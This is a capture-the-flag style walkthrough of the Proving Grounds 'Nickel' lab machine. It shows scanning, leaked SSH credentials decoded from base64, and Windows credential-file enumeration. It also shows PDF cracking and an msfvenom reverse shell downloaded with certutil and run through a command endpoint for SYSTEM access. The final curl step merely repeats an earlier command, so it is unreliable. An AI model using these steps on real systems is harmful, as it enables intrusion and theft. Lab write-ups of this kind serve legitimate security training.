Nickel is rated by the Proving Grounds community as “very hard”. It also listed as one of the best boxes to practice on for the OSCP certification. We start as always, with our nmap.
We start with NMAP.
sudo nmap -sC -sV -p- 192.168.79.99
FileZilla is not accepting anonymous FTP login.
SSH on port 21 and RDP on 3389 are rarely the initial entry points, but something we can keep in mind if come across some credentials.
Open a web browser and navigate to ports 8089 and 3333, for our HTTP servers. Port 8089 seems to be some type of dev environment.
Clicking a button redirects to another IP which is interesting, but also on port 33333, which is our other server.
Start Nikto;
Let’s try and curl these pages as that can often reveal interesting information we can throw into Burpsuite.
The error is interesting; “Cannot GET”. I have had success on occasion changing the request type to POST.
It requires a Content Length, which we can specify with the following;
curl -d "" -X POST http://192.168.79.99:33333/list-running-procsSuccess! We get a list back of the running processes. The most interesting to us is an entry with what appears to be hard-coded credentials using the SSH protocol. SSH was on our NMAP so we are likely getting close.
The password looks Base64 encoded. So let’s decode in Kali.
echo -n Tm93aXNlU2xvb3BUaGVvcnkxMzkK | base64 –decode 
We use these new credentials to log into an SSH shell;
My first commands I use when getting a Windows shell are below. Enumerate OS etc, check for JuicyPotato, common password locations and running netstat.
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
whoami /priv
netstat –nao
dir C:\Windows\System32\config\RegBack\SAM
dir C:\Windows\System32\config\RegBack\SYSTEMOf note with the netstat command is port 80, which was not available on our original nmap scan.
Let’s hunt around user folders. We don’t find anything in Ariah’s download folder, documents or desktop (except the user flag). In the root of C:\ we see the folder FTP.
Let’s download this file to our Kali box using SCP. Start a SSH server if it is not already running
systemctl start ssh.socket Transfer the file;
scp ariah@192.168.79.99:C:/ftp/Infrastructure.pdf . The .pdf file is password-protected, and although we can use John to crack the file, I prefer a tool called PDFCrack. Let’s see if it is in the Kali repository and install it.
PDFCrack simply needs the -f and -w switches for the file and the word-list location.
Password “ariah4168” is recovered. Let’s open the file.
This is very new and interesting information to us. The document references some webservers which were not in our initial scan. It also mentioned a command endpoint.
We already know port 80 is running on this machine so the information in this document might be our next path forward.
Let’s try and use the command endpoint.
This is a good sign. The aim now is to get a reverse shell onto this machine and abuse this to run it, as the shell will come back as SYSTEM. Let’s create the shell.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.79 LPORT=80 -f exe > shell.exe
Start a webserver.
sudo python3 –m http.server 80Use certutil from ariah’s SSH shell to download the shell.
certutil.exe -urlcache -split -f "http://192.168.49.79/shell.exe" 
Kill the HTTP Server and start netcat on port 80, as that is what we created our shell.exe with.
Back to Ariah’s SSH shell, let’s use the curl command to try and find our shell.exe before we run it. Just to make sure our syntax is correct.
I don’t get the expected results. We need to url encode this command. Find any website to do this.
Re run and we get the expected results.
curl http://localhost/?cmd%20%2Fc%20dir%20c%3A%5Cusers%5Cariah%5C
Run the file with an updated encoded URL which will execute shell.exe
curl http://localhost/?cmd%20%2Fc%20dir%20c%3A%5Cusers%5Cariah%5C
And our shell comes back as system.
Definitely an interesting one! I hope you enjoyed.
